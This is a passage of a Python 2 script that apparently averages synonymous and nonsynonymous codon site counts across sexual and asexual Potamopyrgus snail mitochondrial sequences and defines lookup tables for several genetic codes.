while currSeq[-1] == '\n' or currSeq[-1] == '\t' or currSeq[-1] == '\r':
currSeq = currSeq[0:-1]
scaffoldDict[seqName] = currSeq
return scaffoldDict, scaffoldList
def meanSites(fasta):
asexList = ['>$Duluth','>$Heron2','>$McGregor','>$Waik36','>$WalesC','>$clone_1','>$AC51','>$Heron_mitochondrion','>$clone_7','>$Waik37','>$Gunn','>$DenmarkA','>$Waik372','>$Tarawera','>$Poerua_triploid','>$Kaniere_triploid','>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237','>$Brunner_2_4n','>$Brunner_6_3n','>$Grasmere_1_4n','>$Grasmere_6_3n','>$Poerua_72_4n','>$Rotoiti_1_4n']
sexList = ['>$Kaniere_1_2n','>$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309','>$Yellow_Contig_56','>$Alexsex','>$AlexMap','>$Lady','>$Ianthe','>$Rotoroa_1_2n']
antipodarumList = ['>$Duluth','>$Heron2','>$McGregor','>$Waik36','>$WalesC','>$clone_1','>$AC51','>$Heron_mitochondrion','>$clone_7','>$Waik37','>$Gunn','>$DenmarkA','>$Waik372','>$Tarawera','>$Poerua_triploid','>$Kaniere_triploid','>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237','>$Brunner_2_4n','>$Brunner_6_3n','>$Grasmere_1_4n','>$Grasmere_6_3n','>$Poerua_72_4n','>$Rotoiti_1_4n','>$Kaniere_1_2n','>$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309','>$Yellow_Contig_56','>$Alexsex','>$AlexMap','>$Lady','>$Ianthe','>$Rotoroa_1_2n']
seqDict, seqList, codonDict = buildCodonDict(fasta)
sexS = 0
sexN = 0
meanC = 0
meanR = 0
sexMeanC = 0
sexMeanR = 0
asexMeanC = 0
asexMeanR = 0
sexC1 = 0
sexR1 = 0
sexC2 = 0
sexR2 = 0
sexC3 = 0
sexR3 = 0
sexC4 = 0
sexR4 = 0
sexC5 = 0
sexR5 = 0
sexC6 = 0
sexR6 = 0
sexC7 = 0
sexR7 = 0
asexS = 0
asexN = 0
asexC1 = 0
asexR1 = 0
asexC2 = 0
asexR2 = 0
asexC3 = 0
asexR3 = 0
asexC4 = 0
asexR4 = 0
asexC5 = 0
asexR5 = 0
asexC6 = 0
asexR6 = 0
asexC7 = 0
asexR7 = 0
S = 0
N = 0
C1 = 0
R1 = 0
C2 = 0
R2 = 0
C3 = 0
R3 = 0
C4 = 0
R4 = 0
C5 = 0
R5 = 0
C6 = 0
R6 = 0
C7 = 0
R7 = 0
est = countSites(codonDict['>Potamopyrgus_estuarinus']) #[totalSynSites,totalNonsynSites,totalMeanCSites,totalMeanRSites,totalC1Sites,totalR1Sites,totalC2Sites,totalR2Sites,totalC3Sites,totalR3Sites,totalC4Sites,totalR4Sites,totalC5Sites,totalR5Sites,totalC6Sites,totalR6Sites,totalC7Sites,totalR7Sites]
estS = est[0]
estN = est[1]
estMeanC = est[2]
estMeanR = est[3]
estC1 = est[4]
estR1 = est[5]
estC2 = est[6]
estR2 = est[7]
estC3 = est[8]
estR3 = est[9]
estC4 = est[10]
estR4 = est[11]
estC5 = est[12]
estR5 = est[13]
estC6 = est[14]
estR6 = est[15]
estC7 = est[16]
estR7 = est[17]
for item in est:
print str(item) + '\t'
'''outfile = open('sites.txt','w')
for snail in antipodarumList:
snailSites = countSites(codonDict[snail])#[totalSynSites,totalNonsynSites,totalMeanCSites,totalMeanRSites,totalC1Sites,totalR1Sites,totalC2Sites,totalR2Sites,totalC3Sites,totalR3Sites,totalC4Sites,totalR4Sites,totalC5Sites,totalR5Sites,totalC6Sites,totalR6Sites,totalC7Sites,totalR7Sites]
sys.stdout.write(snail)
for item in snailSites:
sys.stdout.write('\t' + str(item))
sys.stdout.write('\n')
S += snailSites[0]
N += snailSites[1]
C1 += snailSites[4]
R1 += snailSites[5]
C2 += snailSites[6]
R2 += snailSites[7]
C3 += snailSites[8]
R3 += snailSites[9]
C4 += snailSites[10]
R4 += snailSites[11]
C5 += snailSites[12]
R5 += snailSites[13]
C6 += snailSites[14]
R6 += snailSites[15]
C7 += snailSites[16]
R7 += snailSites[17]
meanC += snailSites[2]
meanR += snailSites[3]
if snail in sexList:
sexS += snailSites[0]
sexN += snailSites[1]
sexMeanC += snailSites[2]
sexMeanR += snailSites[3]
sexC1 += snailSites[4]
sexR1 += snailSites[5]
sexC2 += snailSites[6]
sexR2 += snailSites[7]
sexC3 += snailSites[8]
sexR3 += snailSites[9]
sexC4 += snailSites[10]
sexR4 += snailSites[11]
sexC5 += snailSites[12]
sexR5 += snailSites[13]
sexC6 += snailSites[14]
sexR6 += snailSites[15]
sexC7 += snailSites[16]
sexR7 += snailSites[17]
elif snail in asexList:
asexS += snailSites[0]
asexN += snailSites[1]
asexMeanC += snailSites[2]
asexMeanR += snailSites[3]
asexC1 += snailSites[4]
asexR1 += snailSites[5]
asexC2 += snailSites[6]
asexR2 += snailSites[7]
asexC3 += snailSites[8]
asexR3 += snailSites[9]
asexC4 += snailSites[10]
asexR4 += snailSites[11]
asexC5 += snailSites[12]
asexR5 += snailSites[13]
asexC6 += snailSites[14]
asexR6 += snailSites[15]
asexC7 += snailSites[16]
asexR7 += snailSites[17]
sexS /= len(sexList)
sexN /= len(sexList)
sexMeanC /= len(sexList)
sexMeanR /= len(sexList)
sexC1 /= len(sexList)
sexR1 /= len(sexList)
sexC2 /= len(sexList)
sexR2 /= len(sexList)
sexC3 /= len(sexList)
sexR3 /= len(sexList)
sexC4 /= len(sexList)
sexR4 /= len(sexList)
sexC5 /= len(sexList)
sexR5 /= len(sexList)
sexC6 /= len(sexList)
sexR6 /= len(sexList)
sexC7 /= len(sexList)
sexR7 /= len(sexList)
asexS /= len(asexList)
asexN /= len(asexList)
sexMeanC /= len(sexList)
sexMeanR /= len(sexList)
asexC1 /= len(asexList)
asexR1 /= len(asexList)
asexC2 /= len(asexList)
asexR2 /= len(asexList)
asexC3 /= len(asexList)
asexR3 /= len(asexList)
asexC4 /= len(asexList)
asexR4 /= len(asexList)
asexC5 /= len(asexList)
asexR5 /= len(asexList)
asexC6 /= len(asexList)
asexR6 /= len(asexList)
asexC7 /= len(asexList)
asexR7 /= len(asexList)
asexMeanC /= len(asexList)
asexMeanR /= len(asexList)
divS = (S + estS)/(len(antipodarumList) + 1)
divN = (N + estN)/(len(antipodarumList) + 1)
divMeanC = (meanC + estMeanC)/(len(antipodarumList) + 1)
divMeanR = (meanR + estMeanR)/(len(antipodarumList) + 1)
divC1 = (C1 + estC1)/(len(antipodarumList) + 1)
divR1 = (R1 + estR1)/(len(antipodarumList) + 1)
divC2 = (C2 + estC2)/(len(antipodarumList) + 1)
divR2 = (R2 + estR2)/(len(antipodarumList) + 1)
divC3 = (C3 + estC3)/(len(antipodarumList) + 1)
divR3 = (R3 + estR3)/(len(antipodarumList) + 1)
divC4 = (C4 + estC4)/(len(antipodarumList) + 1)
divR4 = (R4 + estR4)/(len(antipodarumList) + 1)
divC5 = (C5 + estC5)/(len(antipodarumList) + 1)
divR5 = (R5 + estR5)/(len(antipodarumList) + 1)
divC6 = (C6 + estC6)/(len(antipodarumList) + 1)
divR6 = (R6 + estR6)/(len(antipodarumList) + 1)
divC7 = (C7 + estC7)/(len(antipodarumList) + 1)
divR7 = (R7 + estR7)/(len(antipodarumList) + 1)
S /= len(antipodarumList)
N /= len(antipodarumList)
meanC /= len(antipodarumList)
meanR /= len(antipodarumList)
C1 /= len(antipodarumList)
R1 /= len(antipodarumList)
C2 /= len(antipodarumList)
R2 /= len(antipodarumList)
C3 /= len(antipodarumList)
R3 /= len(antipodarumList)
C4 /= len(antipodarumList)
R4 /= len(antipodarumList)
C5 /= len(antipodarumList)
R5 /= len(antipodarumList)
C6 /= len(antipodarumList)
R6 /= len(antipodarumList)
C7 /= len(antipodarumList)
R7 /= len(antipodarumList)
outfile.write('Group\tS\tN\tmeanC\tmeanR\tC1\tR1\tC2\tR2\tC3\tR3\tC4\tR4\tC5\tR5\tC6\tR6\tC7\tR7\nP.antipodarum-P.estuarinus\t' + str(divS) + '\t' + str(divN) + '\t' + str(divMeanC) + '\t' + str(divMeanR) + '\t' + str(divC1) + '\t' + str(divR1) + '\t' + str(divC2) + '\t' + str(divR2) + '\t' + str(divC3) + '\t' + str(divR3) + '\t' + str(divC4) + '\t' + str(divR4) + '\t' + str(divC5) + '\t' + str(divR5) + '\t' + str(divC6) + '\t' + str(divR6) + '\t' + str(divC7) + '\t' + str(divR7) + '\nP.antipodarum\t' + str(S) + '\t' + str(N) + '\t' + str(meanC) + '\t' + str(meanR) + '\t' + str(C1) + '\t' + str(R1) + '\t' + str(C2) + '\t' + str(R2) + '\t' + str(C3) + '\t' + str(R3) + '\t' + str(C4) + '\t' + str(R4) + '\t' + str(C5) + '\t' + str(R5) + '\t' + str(C6) + '\t' + str(R6) + '\t' + str(C7) + '\t' + str(R7) + '\nSex\t' + str(sexS) + '\t' + str(sexN) + '\t' + str(sexMeanC) + '\t' + str(sexMeanR) + '\t' + str(sexC1) + '\t' + str(sexR1) + '\t' + str(sexC2) + '\t' + str(sexR2) + '\t' + str(sexC3) + '\t' + str(sexR3) + '\t' + str(sexC4) + '\t' + str(sexR4) + '\t' + str(sexC5) + '\t' + str(sexR5) + '\t' + str(sexC6) + '\t' + str(sexR6) + '\t' + str(sexC7) + '\t' + str(sexR7) + '\nAsex\t' + str(asexS) + '\t' + str(asexN) + '\t' + str(asexMeanC) + '\t' + str(asexMeanR) + '\t' + str(asexC1) + '\t' + str(asexR1) + '\t' + str(asexC2) + '\t' + str(asexR2) + '\t' + str(asexC3) + '\t' + str(asexR3) + '\t' + str(asexC4) + '\t' + str(asexR4) + '\t' + str(asexC5) + '\t' + str(asexR5) + '\t' + str(asexC6) + '\t' + str(asexR6) + '\t' + str(asexC7) + '\t' + str(asexR7) + '\n')
outfile.close()'''
def countSites(codonList):
code = 'invertebrateMt'
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt cod
